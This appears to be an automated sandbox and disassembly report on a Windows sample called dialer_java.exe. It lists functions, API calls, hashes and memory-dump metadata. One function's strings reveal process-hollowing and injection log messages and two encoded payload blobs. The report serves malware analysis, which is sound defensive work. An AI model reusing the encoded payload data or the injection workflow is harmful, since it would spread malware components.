Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc
String ID: std
API String ID: 2803490479-2826573480
Opcode ID: 39a9b4e02e6c7c124a628c552a4636f6e40e277c28f87722f2353c0517b7eef5
Instruction ID: 335bef7626b3449bb5ec98ace259fbf67013d858fb3c7d27bc639799b2909afa
Opcode Fuzzy Hash: 39a9b4e02e6c7c124a628c552a4636f6e40e277c28f87722f2353c0517b7eef5
Instruction Fuzzy Hash: E831C13371A78285EA658B1DE0163B93BD4EB04B84F090136DE9D9B391DF3DE1C1831A

Function 00007FF6E3A7EF40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7EFAA
realloc.MSVCRT ref: 00007FF6E3A7F037

Strings

vector[, xrefs: 00007FF6E3A7EFBF

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: vector[
API String ID: 471065373-3542213508
Opcode ID: c4488cd4258865b302a78e24845e525baf049f33d3f4fcfc29418687803e7592
Instruction ID: d949eb53c551a23b2b22904ac5b73f788aed717136d981595c2af76c80a4c891
Opcode Fuzzy Hash: c4488cd4258865b302a78e24845e525baf049f33d3f4fcfc29418687803e7592
Instruction Fuzzy Hash: 8531B0B7B05B8582DF288F1AE45522DAB61EB59FC0F008032CF9E577A4DF2DD0928305

Function 00007FF6E3A794E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A79520
realloc.MSVCRT ref: 00007FF6E3A795B3

Strings

&, xrefs: 00007FF6E3A79545

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: &
API String ID: 471065373-1010288
Opcode ID: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
Instruction ID: 91ae5ab78d5d3cc9d523ee87ce4dd12dd7c39f4b5fc2a5476e92fc4d34410d81
Opcode Fuzzy Hash: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
Instruction Fuzzy Hash: 9F3192B3609B8582DB25CF29F4802ADBBA1E758BC8F048226DB8D57799DF3DD545C301

Function 00007FF6E3A64A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6E3A64A8C
fflush.MSVCRT ref: 00007FF6E3A64B5C

Strings

libunwind: pc not in table, pc=0x%llX, xrefs: 00007FF6E3A64B40

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: EntryFunctionLookupfflush
String ID: libunwind: pc not in table, pc=0x%llX
API String ID: 1930725923-1970586329
Opcode ID: 3d495f0f2960550110fa8eb07f73b5c1ec580fd706c87246941946c30414a956
Instruction ID: 0ed1a8a3803bf97f16974382aa98d563078395d556c82573e284b1b027200a7a
Opcode Fuzzy Hash: 3d495f0f2960550110fa8eb07f73b5c1ec580fd706c87246941946c30414a956
Instruction Fuzzy Hash: 62319173A15B9181E715CF3CE4823A877A1EF89B88F148339CA8D66795EF3994D1C344

Function 00007FF6E3A7AF70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7AFA8

Strings

r"" , xrefs: 00007FF6E3A7AFC7
operator, xrefs: 00007FF6E3A7AFB9

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: operator$r""
API String ID: 471065373-3690342460
Opcode ID: e1620a572d8d04512c69ef91134d241d4fe72b19f885483c170cd34e2c6e07b0
Instruction ID: 65640748e5499c372cc4c634f1e475558fe66badb101fe4b6f203eb31bb5abb7
Opcode Fuzzy Hash: e1620a572d8d04512c69ef91134d241d4fe72b19f885483c170cd34e2c6e07b0
Instruction Fuzzy Hash: 0611B2F7B06B8582DA199F0AE58126CBB61EB58FD0F008432CF4D577A4DF29D5E28300

Function 00007FF6E3A83A80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

_time64.MSVCRT ref: 00007FF6E3A83AA7

Strings

[%Y-%m-%d %H:%M:%S], xrefs: 00007FF6E3A83AC5
%s , xrefs: 00007FF6E3A83AE1

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _time64
String ID: %s $[%Y-%m-%d %H:%M:%S]
API String ID: 1670930206-899559958
Opcode ID: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
Instruction ID: fb622665a8dbf02292f0cf30bcfd6cd6757687318b7233245df5be1ec58096bd
Opcode Fuzzy Hash: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
Instruction Fuzzy Hash: 6E01A132718B8250E6109B18F8563FA6764EF887D0F400031E98E637949E3DD189C705

Function 00007FF6E3A62390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6E3A623EA

Strings

Unknown error, xrefs: 00007FF6E3A623B4
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6E3A623DD

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 0d15dd107c1c7b7ee9c3dbc79bee5512547a48c097ea1489700897209fd66f7b
Instruction ID: 839fac07a16fa56a6815283e9a467fd437beca87475244c179e9a3e49561fad0
Opcode Fuzzy Hash: 0d15dd107c1c7b7ee9c3dbc79bee5512547a48c097ea1489700897209fd66f7b
Instruction Fuzzy Hash: 6EF0C223F1CA8582E6209B2CA9462B96721EB693C1F408235DF4EE7251DF2DE0C28305

Function 00007FF6E3A80777 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 00007FF6E3A80779
strlen.MSVCRT ref: 00007FF6E3A80AE1

Strings

(null), xrefs: 00007FF6E3A80781

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: strerrorstrlen
String ID: (null)
API String ID: 960536887-3941151225
Opcode ID: f2373a739143e5c7c6886a2839f5784e2abfccd3a5dafc2859586661781da765
Instruction ID: d8bc595c9f424996b9c31b0d6a1a25d274f0737c54078518c7a15e03904b2332
Opcode Fuzzy Hash: f2373a739143e5c7c6886a2839f5784e2abfccd3a5dafc2859586661781da765
Instruction Fuzzy Hash: 22E04F13F0D18395E944E65D941B3FE6D5A9FC4390F9C4075D90EE2286EE2FF481414B

Function 00007FF6E3A635C0 Relevance: 5.1, APIs: 4, Instructions: 76stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF6E3A635F6
strcmp.MSVCRT ref: 00007FF6E3A6360E
strcmp.MSVCRT ref: 00007FF6E3A63629
strcmp.MSVCRT ref: 00007FF6E3A63641

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: 66c6bf3b211be3c92e68e951745e0b462fee0e45d65b69b835429f12a872f51f
Instruction ID: 85e487c6d34868f34e81558684a835a2155e949fa993cffd49df4362b26a6392
Opcode Fuzzy Hash: 66c6bf3b211be3c92e68e951745e0b462fee0e45d65b69b835429f12a872f51f
Instruction Fuzzy Hash: C4216877B2964282EAF18A0ED04523B7AE5FB00794F458431CF4D967E0DE3EF8C28646

Function 00007FF6E3A64FFE Relevance: 5.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6E3A65012
TlsGetValue.KERNEL32 ref: 00007FF6E3A6504B
GetLastError.KERNEL32 ref: 00007FF6E3A65050
LeaveCriticalSection.KERNEL32 ref: 00007FF6E3A650CC

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: c3e10df1fb81cec98377597e4f843a6904a990f22e519dfd6c3b42c4d24bae7a
Instruction ID: 115c0735074a3cef13afa66ea1fd7f925ea7f7703a1d39c23ede9fb54814ce01
Opcode Fuzzy Hash: c3e10df1fb81cec98377597e4f843a6904a990f22e519dfd6c3b42c4d24bae7a
Instruction Fuzzy Hash: 0B01083BB19A02C5E6459B1AA9123747B20AF62B90F454031C90EF7690DF2FE8D5874A

Analysis Process: dialer_java.exePID: 7468, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	228
Total number of Limit Nodes:	2

Executed Functions

Function 00007FF6E3A83B80 Relevance: 141.9, APIs: 67, Strings: 13, Instructions: 1888COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF6E3A83CA1
memset.MSVCRT ref: 00007FF6E3A83DC9
wcscat.MSVCRT ref: 00007FF6E3A83DD9
memset.MSVCRT ref: 00007FF6E3A83DED
wcslen.MSVCRT ref: 00007FF6E3A83E56
_wcsnicmp.MSVCRT ref: 00007FF6E3A83E89
wcslen.MSVCRT ref: 00007FF6E3A83E95
wcscpy.MSVCRT ref: 00007FF6E3A83F23
wcscat.MSVCRT ref: 00007FF6E3A83F32
memset.MSVCRT ref: 00007FF6E3A83F43
wcscpy.MSVCRT ref: 00007FF6E3A8406B
wcscat.MSVCRT ref: 00007FF6E3A8407A
memset.MSVCRT ref: 00007FF6E3A84097
wcslen.MSVCRT ref: 00007FF6E3A84113
_wcsnicmp.MSVCRT ref: 00007FF6E3A84139
wcslen.MSVCRT ref: 00007FF6E3A84149
wcscpy.MSVCRT ref: 00007FF6E3A84362
wcscat.MSVCRT ref: 00007FF6E3A84371
_wcsicmp.MSVCRT ref: 00007FF6E3A84380
memset.MSVCRT ref: 00007FF6E3A843B1
wcscpy.MSVCRT ref: 00007FF6E3A84419
wcscat.MSVCRT ref: 00007FF6E3A84428
memset.MSVCRT ref: 00007FF6E3A8443C
wcscpy.MSVCRT ref: 00007FF6E3A844C2
wcscat.MSVCRT ref: 00007FF6E3A844D1
memset.MSVCRT ref: 00007FF6E3A844E5
wcscpy.MSVCRT ref: 00007FF6E3A84538
wcscat.MSVCRT ref: 00007FF6E3A84547
memset.MSVCRT ref: 00007FF6E3A8455B
wcscpy.MSVCRT ref: 00007FF6E3A845EE
wcscat.MSVCRT ref: 00007FF6E3A845FD
memset.MSVCRT ref: 00007FF6E3A84611
wcscpy.MSVCRT ref: 00007FF6E3A84679
wcscat.MSVCRT ref: 00007FF6E3A84688
memset.MSVCRT ref: 00007FF6E3A8469C
wcslen.MSVCRT ref: 00007FF6E3A84705
_wcsnicmp.MSVCRT ref: 00007FF6E3A84739
wcslen.MSVCRT ref: 00007FF6E3A84745
wcscat.MSVCRT ref: 00007FF6E3A8476C
memset.MSVCRT ref: 00007FF6E3A84780
wcscpy.MSVCRT ref: 00007FF6E3A8480F
wcscat.MSVCRT ref: 00007FF6E3A8481E
memset.MSVCRT ref: 00007FF6E3A84B0A
wcscpy.MSVCRT ref: 00007FF6E3A84B70
wcscat.MSVCRT ref: 00007FF6E3A84B7F

Part of subcall function 00007FF6E3A88410: memset.MSVCRT ref: 00007FF6E3A8842F
Part of subcall function 00007FF6E3A88410: wcscpy.MSVCRT ref: 00007FF6E3A88490
Part of subcall function 00007FF6E3A88410: wcscat.MSVCRT ref: 00007FF6E3A8849B
Part of subcall function 00007FF6E3A88410: wcslen.MSVCRT ref: 00007FF6E3A884AC

wcslen.MSVCRT ref: 00007FF6E3A84C97
wcslen.MSVCRT ref: 00007FF6E3A84DFA
_wcsicmp.MSVCRT ref: 00007FF6E3A84E67

Part of subcall function 00007FF6E3A879B0: memset.MSVCRT ref: 00007FF6E3A879DD

memset.MSVCRT ref: 00007FF6E3A84FB5
wcscpy.MSVCRT ref: 00007FF6E3A85044
wcscat.MSVCRT ref: 00007FF6E3A85053
memset.MSVCRT ref: 00007FF6E3A850A7
wcscpy.MSVCRT ref: 00007FF6E3A850B9
wcscat.MSVCRT ref: 00007FF6E3A850C8
_wcsicmp.MSVCRT ref: 00007FF6E3A85264
memset.MSVCRT ref: 00007FF6E3A85283
wcscpy.MSVCRT ref: 00007FF6E3A852E4
wcscat.MSVCRT ref: 00007FF6E3A852F6
wcslen.MSVCRT ref: 00007FF6E3A85309

Part of subcall function 00007FF6E3A87F20: memset.MSVCRT ref: 00007FF6E3A87F82
Part of subcall function 00007FF6E3A87F20: memset.MSVCRT ref: 00007FF6E3A88015
Part of subcall function 00007FF6E3A87F20: wcscpy.MSVCRT ref: 00007FF6E3A8806D
Part of subcall function 00007FF6E3A87F20: wcscat.MSVCRT ref: 00007FF6E3A88078
Part of subcall function 00007FF6E3A87F20: wcslen.MSVCRT ref: 00007FF6E3A88089

wcslen.MSVCRT ref: 00007FF6E3A8576B
memset.MSVCRT ref: 00007FF6E3A85831
wcslen.MSVCRT ref: 00007FF6E3A8589A
_wcsnicmp.MSVCRT ref: 00007FF6E3A858C9
wcslen.MSVCRT ref: 00007FF6E3A858D5
wcscat.MSVCRT ref: 00007FF6E3A858FC
memset.MSVCRT ref: 00007FF6E3A85B5B
memcpy.MSVCRT ref: 00007FF6E3A86196

Strings

[INFO] Mutex not found: %s, xrefs: 00007FF6E3A85938
JzkdaHd1eXdoY3p5ZGJyaXJqZ3doaWx4LWt3cGtodXZqY2VodnV5d2xjenlkYnJpcmpnd2hpbHhta3dwE2h1dmR832Z2wXC6Tdt7NalDJgEbGUcHGgYLCgwGVxMKBhsZHkMHDVYHDBlMChRZIC0hSR8FAxJGTWx4PS53cA/ucnaJgucPdnV5d2xjenmUYlBpeWhpd2hXZXhtL3Vwa2h1dipyZWh2ZXl3bGN6OWVicmlyemd3aGtseGtrd3BraHV2bGNl, xrefs: 00007FF6E3A8594B
[SUCCESS] Payload decrypted, size: %zu bytes, xrefs: 00007FF6E3A85978
[INFO] Process handle closed, xrefs: 00007FF6E3A85CCF
[INFO] inject_process started, xrefs: 00007FF6E3A8574A
[INFO] Process hollowing executed for program: %s, xrefs: 00007FF6E3A85C9F
[INFO] Mutex already exists: %s, xrefs: 00007FF6E3A85803
[ERROR] Invalid process handle, xrefs: 00007FF6E3A85CE0
[ERROR] Failed to decrypt payload, xrefs: 00007FF6E3A85B3D
, xrefs: 00007FF6E3A85371
[INFO] inject_process completed, xrefs: 00007FF6E3A85816
[SUCCESS] Process handle obtained: 0x%p, xrefs: 00007FF6E3A85CB8
VlwdBRpVDxIeEBMWCl9QWFxaRVcNBw8XCQIZF1ZKICIsTlReVEpHemZfLhgXCVIfFxgUHgcHUVpcRURSSxAYGgQQWEoeAQ0HVkxVCgcKFwQTGUkaAQoeFx4EEQRFCxobRRQMBhIaDgRDUUpJUE1CW10HDgNHHQ0LBklJfWFIVUo+EQwPERALBFJucFlEQlJVMAUIAzwbBR8KDgVOZmJVVmNDRVQzGxgVAAYeRxAQBwxORSIZCQsAHQlVenpLSFVWVkwn, xrefs: 00007FF6E3A850E5

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: memset$wcscat$wcscpywcslen$_wcsnicmp$_wcsicmp$memcpy
String ID: $JzkdaHd1eXdoY3p5ZGJyaXJqZ3doaWx4LWt3cGtodXZqY2VodnV5d2xjenlkYnJpcmpnd2hpbHhta3dwE2h1dmR832Z2wXC6Tdt7NalDJgEbGUcHGgYLCgwGVxMKBhsZHkMHDVYHDBlMChRZIC0hSR8FAxJGTWx4PS53cA/ucnaJgucPdnV5d2xjenmUYlBpeWhpd2hXZXhtL3Vwa2h1dipyZWh2ZXl3bGN6OWVicmlyemd3aGtseGtrd3BraHV2bGNl$VlwdBRpVDxIeEBMWCl9QWFxaRVcNBw8XCQIZF1ZKICIsTlReVEpHemZfLhgXCVIfFxgUHgcHUVpcRURSSxAYGgQQWEoeAQ0HVkxVCgcKFwQTGUkaAQoeFx4EEQRFCxobRRQMBhIaDgRDUUpJUE1CW10HDgNHHQ0LBklJfWFIVUo+EQwPERALBFJucFlEQlJVMAUIAzwbBR8KDgVOZmJVVmNDRVQzGxgVAAYeRxAQBwxORSIZCQsAHQlVenpLSFVWVkwn$[ERROR] Failed to decrypt payload$[ERROR] Invalid process handle$[INFO] Mutex already exists: %s$[INFO] Mutex not found: %s$[INFO] Process handle closed$[INFO] Process hollowing executed for program: %s$[INFO] inject_process completed$[INFO] inject_process started$[SUCCESS] Payload decrypted, size: %zu bytes$[SUCCESS] Process handle obtained: 0x%p
API String ID: 1844779378-707888011
Opcode ID: 50f3b661096dc7b1e19b12610b6c206130408c8fe2271caf19ca8527248b59a1
Instruction ID: c24ce5848ccca302d3576c68685f2062b126ceb92425a49d9cb2ef41ec15f2f9
Opcode Fuzzy Hash: 50f3b661096dc7b1e19b12610b6c206130408c8fe2271caf19ca8527248b59a1
Instruction Fuzzy Hash: 45335053D2C7C384F7119B2CA8477F47BA0AFA6344F44523AD98DF65A1EF6E6184830A

Function 00007FF6E3A61160 Relevance: 13.6, APIs: 9, Instructions: 130
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF6E3A61156), ref: 00007FF6E3A611A5
_amsg_exit.MSVCRT(?,?,?,00007FF6E3A61156), ref: 00007FF6E3A611CC
_initterm.MSVCRT ref: 00007FF6E3A6120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF6E3A61156), ref: 00007FF6E3A6124E
malloc.MSVCRT ref: 00007FF6E3A6127E
strlen.MSVCRT ref: 00007FF6E3A612A4
malloc.MSVCRT ref: 00007FF6E3A612B0
memcpy.MSVCRT ref: 00007FF6E3A612C3
_cexit.MSVCRT(?,?,?,00007FF6E3A61156), ref: 00007FF6E3A6132D

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID:
API String ID: 2643109117-0
Opcode ID: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
Instruction ID: ad52f5a23d23c214c2b6e8cc16b8d576ba23f7326ab75b7bd45e7d6b8c5d5049
Opcode Fuzzy Hash: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
Instruction Fuzzy Hash: 62515E73F1964781F6109B2DE95A3793FA4BF95B80F004435C94EE73A1DE2EA4C1874A

Function 00007FF6E3A61394 Relevance: 1.5, APIs: 1, Instructions: 24
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

